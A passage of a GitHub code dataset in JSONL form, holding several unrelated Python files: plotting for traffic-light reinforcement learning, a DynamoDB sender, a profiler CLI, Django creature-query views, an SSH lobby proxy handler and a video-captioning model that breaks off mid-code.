Visualization.save_data_and_plot(data=Simulation.reward_episode, filename='reward',title=\"Reward during testing\", xlabel='Action step', ylabel='Reward')\n Visualization.save_data_and_plot(data=Simulation.queue_length_episode, filename='queue', title=\"Queue length during testing\", xlabel='Step', ylabel='Queue length (vehicles)')\n\n\n Visualization.save_data_and_plot(data=Simulation.reward_episode[:cuts[1]], filename='reward_1',title=\"Reward during 
testing\", xlabel='Action step', ylabel='Reward')\n Visualization.save_data_and_plot(data=Simulation.queue_length_episode[:config['max_steps']], filename='queue_1', title=\"Queue length during testing\", xlabel='Step', ylabel='Queue length (vehicles)')\n #Visualization.save_data_x_y_and_plot(data_x=Simulation.xs, data_y=Simulation.reward_episode, filename='reward_steps',title=\"Reward during testing\", xlabel='Step', ylabel='Reward')\n\n #Average DOES NOT WORK BECAUSE NOT SAME AMOUNT OF POINTS\n #Visualization.save_data_and_plot(data=[(Simulation.reward_episode[i]+Simulation.reward_episode[i+cuts[0]]+Simulation.reward_episode[i+cuts[1]] + Simulation.reward_episode[i+cuts[2]] + Simulation.reward_episode[i+cuts[3]])/5 for i in range(cuts[0])], filename='reward_avg',title=\"Reward average during testing\", xlabel='Action step', ylabel='Reward average')\n \n Visualization.save_data_and_plot(data=[(Simulation.queue_length_episode[i]+Simulation.queue_length_episode[i+config['max_steps']]+Simulation.queue_length_episode[i+(2*config['max_steps'])] + Simulation.queue_length_episode[i+(3*config['max_steps'])] + Simulation.queue_length_episode[i+(4*config['max_steps'])])/5 for i in range(5400)], filename='queue_avg', title=\"Queue length average during testing\", xlabel='Step', ylabel='Queue length average (vehicles)')\n\n\n #LINEAR INTERPOLATION\n # mean_x_axis = [i for i in range(max(Simulation.xs))]\n # ys_interp = [np.interp(mean_x_axis, Simulation.xs[cuts[i]:cuts[i+1]], Simulation.reward_episode[cuts[i]:cuts[i+1]]) for i in range(len(cuts)-1)]\n # mean_y_axis = np.mean(ys_interp, axis=0)\n # Visualization.save_data_x_y_and_plot(data_x=mean_x_axis, data_y=mean_y_axis, filename='reward_avg_linear_interpolation_steps',title=\"Reward average linear interpolation\", xlabel='Step', ylabel='Reward average')\n\n # max_mean_x_axis = [abs(cuts[i+1] - cuts[i]) for i in range(len(cuts)-1)]\n # mean_x_axis = [i for i in range(max(max_mean_x_axis))]\n # ys_interp = [np.interp(mean_x_axis, Simulation.xs[cuts[i]:cuts[i+1]], Simulation.reward_episode[cuts[i]:cuts[i+1]]) for i in range(len(cuts)-1)]\n # mean_y_axis = np.mean(ys_interp, axis=0)\n # Visualization.save_data_x_y_and_plot(data_x=mean_x_axis, data_y=mean_y_axis, filename='reward_avg_linear_interpolation_action_steps',title=\"Reward average linear interpolation\", xlabel='Action Step', ylabel='Reward average')\n","repo_name":"yessine-zghal/PCD_Traffic_Light_Control","sub_path":"DDQN/testing_main.py","file_name":"testing_main.py","file_ext":"py","file_size_in_byte":6385,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"27540993935","text":"import boto3\nimport botocore\nfrom model.temperature_reading import TemperatureReading\n\n\nclass DynamoDbSender:\n def __init__(self, table):\n self.table_name = table\n dynamodb = boto3.resource('dynamodb')\n self.table = dynamodb.Table(self.table_name)\n\n def send(self, temperature_reading: TemperatureReading):\n try:\n self.table.put_item(Item=temperature_reading.get_dict())\n except botocore.exceptions.ClientError as e:\n print(\"Unexpected error: %s\" % e)\n","repo_name":"justinharringa/pi-temp-monitor","sub_path":"sender/dynamodb_sender.py","file_name":"dynamodb_sender.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35962364516","text":"import argparse\nimport logging\nimport shutil\n\nfrom . 
import DiscopopCpp\nfrom discopop_library.global_data.version.utils import get_version\n\nPROG = \"discopop_profiler\"\n\nUSAGE = f\"\"\"{PROG} [--verbose] [--clang CLANG]\n {'':{len(PROG)}} (--CUGeneration | --DPInstrumentation | --DPReduction)\n {'':{len(PROG)}} \n\"\"\"\n\n\ndef main(args=None):\n parser = argparse.ArgumentParser(prog=PROG, description=__doc__, usage=USAGE, add_help=False)\n parser.add_argument(\"-h\", \"--help\", action=\"help\", help=\"Show this help message and exit.\")\n parser.add_argument(\n \"-V\",\n \"--version\",\n action=\"version\",\n version=f\"%(prog)s {get_version()}\",\n help=\"Show version number and exit.\",\n )\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n action=\"store_true\",\n help=\"Show additional information such as clang++ invocations.\",\n )\n parser.add_argument(\"--clang\", help=\"Path to clang++ executable.\")\n action = parser.add_mutually_exclusive_group()\n action.add_argument(\n \"--CUGeneration\",\n \"--cugeneration\",\n action=\"store_true\",\n help=\"Obtain the computational unit (CU) graph of the target application.\",\n )\n action.add_argument(\n \"--DPInstrumentation\",\n \"--dpinstrumentation\",\n action=\"store_true\",\n help=\"Instrument the target application to obtain data dependences.\",\n )\n action.add_argument(\n \"--DPReduction\",\n \"--dpreduction\",\n action=\"store_true\",\n help=\"Instrument the target application to obtain the list of reduction operations.\",\n )\n parameters, clang_args = parser.parse_known_args(args)\n\n logging.basicConfig(\n format=\"%(message)s\",\n level=logging.INFO if parameters.verbose else logging.WARNING,\n )\n\n if not any([parameters.CUGeneration, parameters.DPInstrumentation, parameters.DPReduction]):\n logging.warning(\n \"Warning: Not using any DiscoPoP LLVM pass (specify either --CUGeneration, \"\n \"--DPInstrumentation or --DPReduction).\",\n )\n clang_path = parameters.clang or shutil.which(\"clang++-8\") or shutil.which(\"clang++\")\n if not clang_path:\n raise SystemExit(\"clang++ executable not found in PATH. 
Specify --clang PATH/TO/CLANG++.\")\n if not clang_args:\n logging.warning(\"Warning: No arguments to clang++ were given.\")\n\n clang_proc = DiscopopCpp(\n cugeneration=parameters.CUGeneration,\n dpinstrumentation=parameters.DPInstrumentation,\n dpreduction=parameters.DPReduction,\n clang_path=clang_path,\n ).invoke(clang_args)\n if clang_proc.returncode != 0:\n raise SystemExit(clang_proc.returncode)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"discopop-project/discopop","sub_path":"discopop_profiler/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"72"} +{"seq_id":"18916028201","text":"from qlib.utils.logging import get_logger, log\n\nfrom ..controllers.dto import Result\nfrom ..controllers.dto.quality_dimension_detail import GetQualityDimensionDetailRes\nfrom ..entities.guideline import GuidelineMapper\nfrom ..entities.quality_dimension import QualityDimensionMapper\nfrom ..across.exception import QAINotFoundException\n\n\nlogger = get_logger()\n\n\nclass QualityDimensionDetailService:\n\n @log(logger)\n def get_quality_dimension_detail(self, guideline_name: str, qd_name: str):\n\n # QDテーブルからデータ取得\n quality_dimension = QualityDimensionMapper.query.\\\n join(GuidelineMapper, GuidelineMapper.id == QualityDimensionMapper.guideline_id).\\\n filter(QualityDimensionMapper.name == qd_name).\\\n filter(GuidelineMapper.name == guideline_name).first()\n\n # 品質特性が存在しないまたは削除されている場合エラー\n if quality_dimension is None or quality_dimension.delete_flag:\n raise QAINotFoundException('Q02404', 'not found quality dimension.')\n\n return GetQualityDimensionDetailRes(\n result=Result(code='Q02000', message='Success.'),\n quality_dimension=quality_dimension.to_dto()\n )\n\n","repo_name":"aistairc/qunomon","sub_path":"qunomon/src/backend/qai_testbed_backend/usecases/quality_dimension_detail.py","file_name":"quality_dimension_detail.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"33836833932","text":"\nfrom pyxs.exceptions import UnexpectedPacket\nfrom pyxs.client import Router\n\n\nfrom pyxs._internal import Event\nfrom pyxs._internal import NUL\nfrom pyxs._internal import Op\n\n\nimport select\n\n\nclass XenGuestRouter(Router):\n def __call__(self):\n try:\n while True:\n rlist, _wlist, _xlist = select.select(\n [self.connection, self.r_terminator], [], [])\n if not rlist:\n continue\n elif self.r_terminator in rlist:\n break\n\n packet = self.connection.recv()\n if packet.op == Op.WATCH_EVENT:\n event = Event(*packet.payload.split(NUL)[:-1])\n for monitor in self.monitors[event.token]:\n monitor.events.put(event)\n else:\n \"\"\"\n The try/except is the reason for the subclass from the\n pyxs package. 
Since this is on the guest only the below\n gets the packet payload and returns it without the\n validation piece failing.\n \"\"\"\n rvar = None\n try:\n self.rvars[packet.rq_id]\n rvar = self.rvars.pop(packet.rq_id, None)\n except Exception:\n temp_rq_id = list(self.rvars.keys())[0]\n rvar = self.rvars.pop(temp_rq_id, None)\n\n if rvar is None:\n raise UnexpectedPacket(packet)\n else:\n rvar.set(packet)\n finally:\n self.connection.close()\n self.r_terminator.close()\n self.w_terminator.close()\n","repo_name":"Rackspace-DOT/nova-agent","sub_path":"novaagent/xenbus.py","file_name":"xenbus.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"37898564557","text":"import json\r\nimport re\r\nimport numpy as np\r\n\r\nfrom gensim import corpora, models\r\n\r\nfrom stop_words import get_stop_words\r\nen_stop = get_stop_words('en')\r\nes_stop = get_stop_words('es')\r\n\r\nfrom nltk.stem.porter import PorterStemmer\r\np_stemmer = PorterStemmer()\r\n\r\nfrom nltk.tokenize import RegexpTokenizer\r\ntokenizer = RegexpTokenizer(r'\\w+')\r\n\r\nwith open('enDoc.txt') as line:\r\n document = line.read().splitlines()\r\n\r\ntime = 0\r\n\r\ntexts = []\r\n\r\n# loop through document list\r\nthefile = open('cleanDoc.txt', 'w')\r\nfor i in document:\r\n\r\n print(time)\r\n time = time + 1\r\n # clean and tokenize document string\r\n cleanString = re.sub('(http://\\S+|\\S*[^\\w\\s]\\S*)', '', i)\r\n\r\n raw = cleanString.lower()\r\n tokens = tokenizer.tokenize(raw)\r\n\r\n # remove stop words from tokens\r\n stopped_tokens_en = [i for i in tokens if not i in en_stop]\r\n #stopped_tokens = [i for i in stopped_tokens_en if not i in es_stop]\r\n\r\n # stem tokens\r\n stemmed_tokens = [p_stemmer.stem(i) for i in stopped_tokens_en]\r\n\r\n # add tokens to list\r\n str1 = ' '.join(stopped_tokens_en)\r\n thefile.write(str1)\r\n thefile.write('\\n')\r\n\r\n\r\nthefile.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"finalproject2017/topicmodel","sub_path":"code/pro_data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39995626596","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, Http404\nfrom django.core.paginator import Paginator\n\nfrom .models import Creep, Type, Size, Alignment, Skill\n\nimport string\nimport json\nimport re\n\ndef load_damage_field(creep, field, creep_obj):\n\n damage_types = []\n for damage in getattr(creep, field).order_by('id'):\n damage_types.append(damage.value)\n\n damage_str = ', '.join(damage_types)\n creep_obj[field] = damage_str\n\ndef load_actions(creep, field, creep_obj):\n\n actions = []\n for action in getattr(creep, field).order_by('id'):\n action_obj = { }\n action_obj['name'] = action.name\n action_obj['desc'] = action.desc\n if action.attack_bonus:\n action_obj['attack_bonus'] = action.attack_bonus\n if action.damage_dice:\n action_obj['damage_dice'] = action.damage_dice\n if action.damage_bonus:\n action_obj['damage_bonus'] = action.damage_bonus\n actions.append(action_obj)\n\n creep_obj[field] = actions\n\ndef load_creep_fields(creep, fields):\n \n def has_field(field):\n if fields == 'none':\n return False\n elif fields == 'all':\n return True\n else:\n return field in fields\n\n creep_obj = { }\n\n if has_field('id'):\n creep_obj['id'] = creep.id\n if has_field('name'):\n creep_obj['name'] = 
string.capwords(creep.name)\n if has_field('size'):\n creep_obj['size'] = string.capwords(creep.size.value)\n if has_field('type'):\n creep_obj['type'] = creep.type.value\n if has_field('subtype'):\n if creep.subtype:\n creep_obj['subtype'] = creep.subtype.subtype\n else:\n creep_obj['subtype'] = ''\n if has_field('alignment'):\n creep_obj['alignment'] = creep.alignment.value\n\n if has_field('armor_class'):\n creep_obj['armor_class'] = creep.armor_class\n if has_field('hit_points'):\n creep_obj['hit_points'] = creep.hit_points\n if has_field('hitdice'):\n creep_obj['hit_dice'] \\\n = str(creep.hitdice_num) + 'd' + str(creep.hitdice_type)\n if has_field('speed'):\n creep_obj['speed'] = creep.speed\n\n if has_field('strength'):\n creep_obj['strength'] = creep.strength\n if has_field('dexterity'):\n creep_obj['dexterity'] = creep.dexterity\n if has_field('constitution'):\n creep_obj['constitution'] = creep.constitution\n if has_field('intelligence'):\n creep_obj['intelligence'] = creep.intelligence\n if has_field('wisdom'):\n creep_obj['wisdom'] = creep.wisdom\n if has_field('charisma'):\n creep_obj['charisma'] = creep.charisma\n\n if has_field('saving_throws'):\n for st in creep.saving_throws.order_by('ability'):\n creep_obj[st.ability.value + '_save'] \\\n = st.modifier\n\n if has_field('skills'):\n for creep_skill in creep.skills.order_by('skill'):\n creep_obj[creep_skill.skill.value] = creep_skill.modifier\n\n if has_field('damage_vulnerabilities'):\n load_damage_field(creep, 'damage_vulnerabilities', creep_obj)\n\n if has_field('damage_resistances'):\n load_damage_field(creep, 'damage_resistances', creep_obj)\n\n if has_field('damage_immunities'):\n load_damage_field(creep, 'damage_immunities', creep_obj)\n\n if has_field('condition_immunities'):\n conditions = []\n for condition in creep.condition_immunities.order_by('id'):\n conditions.append(condition.value)\n conditions_str = ', '.join(conditions)\n creep_obj['condition_immunities'] = conditions_str\n\n if has_field('senses'):\n creep_obj['senses'] = creep.senses\n\n if has_field('languages'):\n languages = []\n for language in creep.languages.order_by('id'):\n languages.append(language.value)\n languages_str = ', '.join(languages)\n creep_obj['languages'] = languages_str\n\n if has_field('challenge_rating'):\n cr_ratio = creep.challenge_rating.as_integer_ratio()\n creep_obj['cr_num'] = cr_ratio[0]\n creep_obj['cr_den'] = cr_ratio[1]\n\n if has_field('special_abilities'):\n load_actions(creep, 'special_abilities', creep_obj)\n if has_field('actions'):\n load_actions(creep, 'actions', creep_obj)\n if has_field('legendary_actions'):\n load_actions(creep, 'legendary_actions', creep_obj)\n if has_field('reactions'):\n load_actions(creep, 'reactions', creep_obj)\n\n return creep_obj\n\ndef creep_by_id(request, creep_id):\n \n creep = Creep.objects.get(id=int(creep_id))\n\n fields = 'all'\n if 'fields' in request.GET.keys():\n fields = request.GET['fields'].split(',')\n\n creep_obj = load_creep_fields(creep, fields)\n creep_json = json.dumps(creep_obj)\n\n return HttpResponse(creep_json)\n\nQUERY_PAGE_MAX = 20\n\ndef query_creeps(request):\n\n def get_url_field(field):\n if field in request.GET.keys():\n return request.GET[field]\n return None\n\n name_field = get_url_field('name')\n type_field = get_url_field('type')\n crmin_field = get_url_field('crmin')\n crmax_field = get_url_field('crmax')\n fields = get_url_field('fields')\n page = get_url_field('page')\n\n creeps = Creep.objects.order_by('name')\n if name_field is not None:\n 
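# split the query on whitespace; chaining one filter per token means every token must match the name\n        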
name_filters = re.split(r'\\s+', name_field)\n for name_filt in name_filters:\n creeps = creeps.filter(name__contains=name_filt)\n\n if type_field is not None:\n creeps = creeps.filter(type__type__exact=type_field)\n\n if crmin_field is not None:\n creeps = creeps.filter(challenge_rating__gte=float(crmin_field))\n\n if crmax_field is not None:\n creeps = creeps.filter(challenge_rating__lte=float(crmax_field))\n\n if page is None:\n page = 1\n\n paginator = Paginator(creeps, QUERY_PAGE_MAX)\n page = paginator.page(page)\n\n creep_objs = []\n for creep in page.object_list:\n creep_objs.append(load_creep_fields(creep, fields))\n\n query_response = {\n 'num_creeps': paginator.count,\n 'num_creeps_per_page': paginator.per_page,\n 'creeps': creep_objs,\n }\n\n response_json = json.dumps(query_response)\n return HttpResponse(response_json)\n\ndef query_meta(request, field_name):\n\n if field_name == 'sizes':\n sizes = [size.value for size in Size.objects.filter(woc=True)]\n return HttpResponse(json.dumps(sizes))\n elif field_name == 'types':\n types = [ctype.value for ctype in Type.objects.filter(woc=True)]\n return HttpResponse(json.dumps(types))\n elif field_name == 'alignments':\n aligns = [align.value for align in Alignment.objects.filter(woc=True)]\n return HttpResponse(json.dumps(aligns))\n elif field_name == 'skills':\n skills = [skill.value for skill in Skill.objects.filter(woc=True)]\n return HttpResponse(json.dumps(skills))\n else:\n raise Http404('Unknown meta field name %s' % field_name)\n\n","repo_name":"mikeframpo/krumm","sub_path":"krummserver/creeps/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23645015914","text":"import logging\nimport os\nimport select\nimport socket\nimport threading\nfrom binascii import hexlify\nfrom io import StringIO\nfrom subprocess import Popen\nfrom typing import Dict, Optional, OrderedDict, Tuple\n\nimport paramiko\nfrom paramiko.channel import Channel\nfrom paramiko.transport import Transport\n\nfrom lobbyboy import __version__\nfrom lobbyboy.config import (\n LBConfig,\n LBServerMeta,\n load_local_servers,\n update_local_servers,\n)\nfrom lobbyboy.exceptions import (\n NoProviderException,\n ProviderException,\n UserCancelException,\n)\nfrom lobbyboy.provider import BaseProvider\nfrom lobbyboy.server import Server\nfrom lobbyboy.server_killer import ServerKiller\nfrom lobbyboy.utils import (\n DoGSSAPIKeyExchange,\n KeyTypeSupport,\n active_session,\n active_session_lock,\n available_server_db_lock,\n choose_option,\n confirm_ssh_key_pair,\n send_to_channel,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass SocketHandlerThread(threading.Thread):\n def __init__(self, sock: socket, address, config: LBConfig, providers: Dict[str, BaseProvider]) -> None:\n super().__init__()\n self.socket_client = sock\n self.client_address = address\n self.config = config\n self.providers: Dict[str, BaseProvider] = providers\n self.killer = ServerKiller(providers, config.servers_db_path)\n self.channel: Optional[Channel] = None\n\n def choose_providers(self) -> BaseProvider:\n if not self.providers:\n send_to_channel(self.channel, \"There is no available providers.\")\n raise NoProviderException(\"Do not have available providers to provision a new server!\")\n default = None\n ask_prompt = \"Please choose a provider to create a new server: \"\n if len(self.providers) == 1:\n default = 0\n default_provider = 
next(iter(self.providers.keys()))\n ask_prompt = f\"Please choose a provider to create a new server [default: {default_provider}]: \"\n user_input = choose_option(\n self.channel,\n list(self.providers.keys()),\n option_prompt=\"Available VPS providers:\",\n ask_prompt=ask_prompt,\n default=default,\n )\n return list(self.providers.values())[user_input]\n\n def choose_server(self) -> LBServerMeta:\n available_servers: OrderedDict[str, LBServerMeta] = load_local_servers(self.config.servers_db_path)\n if not available_servers:\n send_to_channel(self.channel, \"There is no available servers, provision a new server...\")\n return self._ask_user_to_create_server()\n\n options = [\"Create a new server...\"]\n meta: LBServerMeta\n for meta in available_servers.values():\n server_desc = f\"{meta.provider_name} {meta.server_name} {meta.server_host}\"\n sessions_cnt = len(active_session.get(meta.server_name, []))\n options.append(f\"Enter {server_desc} ({sessions_cnt} active sessions)\")\n user_input = choose_option(\n self.channel,\n options,\n option_prompt=f\"There are {len(available_servers)} available servers:\",\n )\n\n logger.info(f\"user choose server input={user_input}.\")\n if user_input == 0:\n return self._ask_user_to_create_server()\n user_input -= 1\n return list(available_servers.values())[user_input]\n\n def _ask_user_to_create_server(self) -> LBServerMeta:\n provider: BaseProvider = self.choose_providers()\n meta: LBServerMeta = provider.create_server(self.channel)\n\n with available_server_db_lock:\n update_local_servers(self.config.servers_db_path, new=[meta])\n return meta\n\n def _create_proxy_process(self, slave_fd) -> Tuple[Popen, LBServerMeta]:\n # if has available servers, prompt login or create\n # if no, create, and redirect\n meta: LBServerMeta = self.choose_server()\n provider = self.providers.get(meta.provider_name)\n if not provider:\n raise NoProviderException(f\"not find provider for server {meta.server_name}\")\n\n ssh_command_units = provider.ssh_server_command(meta)\n ssh_command = \" \".join(str(i) for i in ssh_command_units)\n logger.info(f\"ssh to server {meta.server_name} {meta.server_host}: {ssh_command}\")\n send_to_channel(\n self.channel,\n f\"Redirect you to {meta.provider_name} server: {meta.server_name} ({meta.server_host})...\",\n )\n proxy_subprocess = Popen(\n ssh_command,\n shell=True,\n preexec_fn=os.setsid,\n stdin=slave_fd,\n stdout=slave_fd,\n stderr=slave_fd,\n universal_newlines=True,\n )\n with active_session_lock:\n active_session.setdefault(meta.server_name, []).append(self.channel.get_transport())\n return proxy_subprocess, meta\n\n def prepare_server(self, t: Transport, key_type: KeyTypeSupport = KeyTypeSupport.RSA) -> Optional[Server]:\n try:\n t.load_server_moduli()\n except: # noqa\n logger.error(\"(Failed to load moduli -- gex will be unsupported.)\")\n raise\n\n pri, _ = confirm_ssh_key_pair(key_type=key_type, save_path=self.config.data_dir, key_name=\"ssh_host_rsa_key\")\n host_key = paramiko.RSAKey.from_private_key(StringIO(pri))\n\n logger.info(\"Read host key: \" + hexlify(host_key.get_fingerprint()).decode())\n t.add_server_key(host_key)\n\n server = Server(self.config)\n try:\n t.start_server(server=server)\n except paramiko.SSHException:\n logger.error(\"*** SSH negotiation failed.\")\n logger.error(f\"close the transport now... 
{t}\")\n return\n\n self.channel = t.accept(timeout=20)\n if self.channel is None:\n logger.error(\"Client never open a new channel, close transport now...\")\n return\n return server\n\n def prepare_shell_env(self, server: Server, t: Transport) -> Tuple[Optional[LBServerMeta], Optional[Popen]]:\n server.shell_event.wait()\n if not server.shell_event.is_set():\n logger.warning(\"Client never asked for a shell, I am going to end this ssh session now...\")\n send_to_channel(\n self.channel,\n \"*** Client never asked for a shell. Server will end session...\",\n )\n return None, None\n\n logger.info(f\"transport peer name: {t.getpeername()}\")\n proxy_subprocess = lb_server = None\n try:\n proxy_subprocess, lb_server = self._create_proxy_process(server.slave_fd)\n except UserCancelException:\n logger.warning(\"user input Ctrl-C or Ctrl-D during the input.\")\n send_to_channel(self.channel, \"Got EOF, closing session...\")\n except ProviderException as e:\n logger.warning(f\"got exceptions from provider: {e}\")\n send_to_channel(self.channel, f\"LobbyBoy got exceptions from provider: {e}\")\n except Exception as e:\n logger.warning(f\"got exceptions: {e}\")\n send_to_channel(self.channel, f\"LobbyBoy got exceptions: {e}\")\n raise\n\n if not (proxy_subprocess and lb_server):\n return None, None\n\n logger.info(f\"proxy subprocess created, pid={proxy_subprocess.pid}\")\n server.proxy_subprocess_pid = proxy_subprocess.pid\n\n send_to_channel(self.channel, int(server.window_width) * \"=\")\n return lb_server, proxy_subprocess\n\n def user_using(self, server: Server, proxy_subprocess: Popen):\n channel_fd = self.channel.fileno()\n master_fd = server.master_fd\n while proxy_subprocess.poll() is None:\n r, *_ = select.select([master_fd, channel_fd], [], [], 0.1)\n if master_fd in r:\n send_to_channel(self.channel, os.read(master_fd, 10240), suffix=b\"\")\n elif channel_fd in r:\n os.write(master_fd, self.channel.recv(10240))\n\n def cleanup(self, t: Transport = None, meta: LBServerMeta = None, check_destroy: bool = False):\n if t and meta:\n self.remove_server_session(t, meta.server_name)\n if check_destroy:\n self.destroy_server_if_needed(meta)\n\n if self.channel:\n self.channel.shutdown(0)\n if t:\n t.close()\n\n def destroy_server_if_needed(self, server: LBServerMeta):\n provider = self.providers[server.provider_name]\n need_destroy, reason = self.killer.need_destroy(provider, server)\n send_to_channel(self.channel, f\"LobbyBoy: This server {reason}.\")\n if not need_destroy:\n return\n\n send_to_channel(self.channel, f\"LobbyBoy: I will destroy {server.server_name}({server.server_host}) now!\")\n self.killer.destroy(provider, server, self.channel)\n send_to_channel(\n self.channel,\n f\"LobbyBoy: Server {server.server_name}({server.server_host}) has been destroyed.\",\n )\n\n @staticmethod\n def remove_server_session(transport: Transport, server_name: str):\n peer_name = transport.getpeername()\n with active_session_lock:\n sessions = active_session.get(server_name)\n if sessions:\n active_session[server_name] = list(filter(lambda x: x.getpeername() != peer_name, sessions))\n\n def run(self):\n logger.info(\n f\"start new thread \"\n f\"handle {self.socket_client}, \"\n f\"address: {self.client_address}, \"\n f\"my thread id={threading.get_ident()}\"\n )\n t = Transport(self.socket_client, gss_kex=DoGSSAPIKeyExchange)\n try:\n t.set_gss_host(socket.getfqdn())\n server = self.prepare_server(t)\n if not (server and self.channel):\n self.cleanup(t)\n return\n\n send_to_channel(self.channel, 
f\"Welcome to LobbyBoy {__version__}!\")\n lb_server, proxy_subprocess = self.prepare_shell_env(server, t)\n if not (proxy_subprocess and lb_server):\n logger.error(\"failed to create proxy subprocess or lb_server\")\n self.cleanup(t, meta=lb_server)\n return\n\n self.user_using(server, proxy_subprocess)\n send_to_channel(\n self.channel,\n f\"LobbyBoy: SSH to remote server {lb_server.server_name} closed.\",\n )\n self.cleanup(t, meta=lb_server, check_destroy=True)\n except Exception: # noqa\n logger.critical(\"*** Socket thread error.\", exc_info=True)\n self.cleanup(t)\n","repo_name":"lobbyboy-ssh/lobbyboy","sub_path":"lobbyboy/socket_handle.py","file_name":"socket_handle.py","file_ext":"py","file_size_in_byte":10661,"program_lang":"python","lang":"en","doc_type":"code","stars":235,"dataset":"github-code","pt":"72"} +{"seq_id":"27956074300","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.utils.data import Dataset,DataLoader\nfrom torch import optim\nimport os\nimport numpy as np\nimport json\nimport random\nimport sys\n\ndata_dir = sys.argv[1]\n\nVOCAB_SIZE = 3004 \nDATA_DIR = os.path.join(data_dir,'training_data/feat')\nTEST_DIR = os.path.join(data_dir,'testing_data/feat')\nSAVE_DIR = './save'\nLABEL_PATH = os.path.join(data_dir,'training_label.json')\nID_PATH = os.path.join(data_dir,'testing_id.txt')\nPAD_TOKEN = 0\nBOS_TOKEN = 1\nEOS_TOKEN = 2\nUNK_TOKEN = 3\nhidden_size = 256 \npostfix = 'clip25_lr-3_3000_ss6_integrate'\n\nclass Vocab:\n\tdef __init__(self,label_path):\n\t\tprint(\"Building Vocab\")\n\t\twith open(label_path,'r') as f:\n\t\t\tself.label = json.load(f)\n\t\tself.word2index = {'':0,'':1, '':2, '':3}\n\t\tself.index2word = {0:'',1:'',2:'',3:''}\n\t\tself.word2count = {'':1,'':1,'':1,'':1}\n\t\tself.num_words = 4 \n\t\tself.build()\n\tdef build(self):\n\t\tfor l in self.label:\n\t\t\tfor line in l[\"caption\"]:\n\t\t\t\tfor ch in '.!()':\n\t\t\t\t\tif ch in line:\n\t\t\t\t\t\tline = line.replace(ch,'')\n\t\t\t\tfor w in line.strip().split():\n\t\t\t\t\tif w not in self.word2count.keys():\n\t\t\t\t\t\tself.word2count[w] = 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.word2count[w] += 1\n\t\tsorted_word = [w for (w,c) in sorted(self.word2count.items(), key = lambda x: x[1], reverse = True)]\n\t\tfor w in sorted_word[:3000]:\n\t\t\tself.word2index[w] = self.num_words\n\t\t\tself.index2word[self.num_words] = w\n\t\t\tself.num_words += 1\n\ndef cap2index(caption,V):\n\tfor ch in '.!()':\n\t\tif ch in caption:\n\t\t\tcaption = caption.replace(ch, '')\n\tcaption_index = [PAD_TOKEN for _ in range(50)]\n\tfor i,word in enumerate(caption.split()):\n\t\tif word in V.word2index.keys():\n\t\t\tcaption_index[i] = V.word2index[word]\n\t\telse:\n\t\t\tcaption_index[i] = UNK_TOKEN\n\tcaption_index[len(caption.split())] = EOS_TOKEN\n\treturn caption_index\n\nclass TA_Dataset(Dataset):\n\tdef __init__(self,data_dir,label_path):\n\t\tprint(\"Preparing dataset\")\n\t\tself.data_dir = data_dir\n\t\twith open(label_path,'r') as f:\n\t\t\tself.label = json.load(f)\n\n\tdef __len__(self):\n\t\treturn len(self.label)\n\t\n\tdef __getitem__(self,index):\n\t\tavi_id = self.label[index][\"id\"]+'.npy'\n\t\tdata = torch.from_numpy(np.load(os.path.join(self.data_dir,avi_id))).float().cuda()\n\t\tcaption_index = torch.LongTensor(cap2index(random.choice(self.label[index][\"caption\"]),V)).cuda()\n\t\treturn data,caption_index\n\nclass Testset(Dataset):\n\tdef __init__(self,data_dir,id_path):\n\t\tprint(\"Preparing dataset\")\n\t\tself.data_dir = 
data_dir\n\t\tself.label = []\n\t\twith open(id_path,'r') as f:\n for line in f:\n self.label.append(line.strip())\n\tdef __len__(self):\n\t\treturn len(self.label)\n\t\n\tdef __getitem__(self,index):\n\t\tavi_id = self.label[index]+'.npy'\n\t\tdata = np.load(os.path.join(self.data_dir,avi_id))\n\t\treturn data,self.label[index]\n\n\nclass Encoder(nn.Module):\n\tdef __init__(self,input_size,hidden_size,layer=1):\n\t\tsuper(Encoder,self).__init__()\n\t\tself.input_size = input_size\n\t\tself.hidden_size = hidden_size\n\t\tself.layer = layer\n\t\tself.lstm = nn.LSTM(input_size,hidden_size,layer,batch_first = True)\n\t\n\tdef forward(self,data,hidden):\n\t\tfor i in range(self.layer):\n\t\t\toutput,hidden = self.lstm(data,hidden)\n\t\treturn output,hidden\n\n\tdef init_hidden(self,batch_size):\n\t\treturn Variable(torch.zeros(1,batch_size,self.hidden_size).cuda()),Variable(torch.zeros(1,batch_size,self.hidden_size).cuda())\n\nclass Decoder(nn.Module):\n\tdef __init__(self,input_size,hidden_size,layer=1):\n\t\tsuper(Decoder,self).__init__()\n\t\tself.input_size = input_size\n\t\tself.hidden_size = hidden_size\n\t\tself.layer = layer\n\t\tself.lstm = nn.LSTM(input_size,hidden_size,layer,batch_first = True)\n\t\tself.hidden2out = nn.Linear(hidden_size,VOCAB_SIZE)\n\t\tself.softmax = nn.LogSoftmax()\n\t\tself.embedding = nn.Embedding(VOCAB_SIZE,hidden_size)\n\n\tdef forward(self,data,hidden):\n\t\tfor i in range(self.layer):\n\t\t\toutput,hidden = self.lstm(data,hidden)\n\t\t\tresult = self.softmax(self.hidden2out(output).view(-1,VOCAB_SIZE))\n\t\t\tembed = self.embedding(torch.max(result,1)[1]).view(-1,1,hidden_size)\n\t\treturn result, embed, 